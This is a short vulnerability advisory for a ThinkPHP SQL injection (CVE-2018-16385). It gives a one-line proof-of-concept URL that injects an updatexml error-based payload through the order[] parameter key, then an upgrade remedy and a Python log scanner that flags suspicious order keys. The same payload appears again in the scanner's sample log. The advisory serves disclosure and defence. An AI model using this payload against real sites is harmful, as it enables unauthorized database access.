SQL injection at ThinkPHP

SQL injection at ThinkPHP - CVE-2018-16385

Overview

ThinkPHP versions earlier than 5.1.23 are vulnerable to SQL injection at public/index/index/test/index; the PoC below injects through the key of the `order` array parameter.

PoC

http://127.0.0.1/tp5/public/index/index/test/index?order[id`|updatexml(1,concat(0x3a,user()),1)%23]=1

Remediation

Update ThinkPHP to 5.1.23 or later.
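An added detection example, not code from this advisory or from the ThinkPHP project: it scans constructed access-log lines for requests whose `order[...]` key is not a plain column identifier, which is the shape of the PoC above. The same identifier check, applied to the parameter before it reaches the query builder, is the input validation a deployment can add until the upgrade is done; the log lines and host are constructed sample data.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed sample access-log lines (not real traffic). The first mirrors the
# PoC above; the other two are benign requests to the same route.
SAMPLE_LOG = """\
127.0.0.1 - - [01/Jan/2019:12:00:00 +0000] "GET /tp5/public/index/index/test/index?order[id`|updatexml(1,concat(0x3a,user()),1)%23]=1 HTTP/1.1" 200 512
127.0.0.1 - - [01/Jan/2019:12:00:01 +0000] "GET /tp5/public/index/index/test/index?order[id]=desc HTTP/1.1" 200 512
127.0.0.1 - - [01/Jan/2019:12:00:02 +0000] "GET /tp5/public/index/index/test/index?order[create_time]=asc&page=2 HTTP/1.1" 200 512
"""

# A column used as an ORDER BY key should be a bare identifier: no backticks,
# parentheses, pipes or comment markers.
SAFE_IDENT = re.compile(r"^[A-Za-z_][A-Za-z0-9_]*$")
# Parameter names of the form order[<key>]; <key> is the part the PoC abuses.
ORDER_KEY = re.compile(r"^order\[(.*)\]$", re.DOTALL)
REQUEST_LINE = re.compile(r'"(?:GET|POST) (\S+) HTTP/')


def unsafe_order_keys(url):
    """Return the decoded order[...] keys in a URL that are not plain identifiers."""
    query = urlsplit(url).query  # %23 stays in the query; a literal '#' would not
    bad = []
    for name, _value in parse_qsl(query, keep_blank_values=True):
        m = ORDER_KEY.match(name)
        if m and not SAFE_IDENT.match(m.group(1)):
            bad.append(m.group(1))
    return bad


def scan_log(text):
    """Return (line_number, offending_keys) for each log line that matches the pattern."""
    hits = []
    for n, line in enumerate(text.splitlines(), 1):
        m = REQUEST_LINE.search(line)
        if not m:
            continue
        bad = unsafe_order_keys(m.group(1))
        if bad:
            hits.append((n, bad))
    return hits


if __name__ == "__main__":
    for line_no, keys in scan_log(SAMPLE_LOG):
        print(f"line {line_no}: suspicious order keys {keys}")
```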

Resources
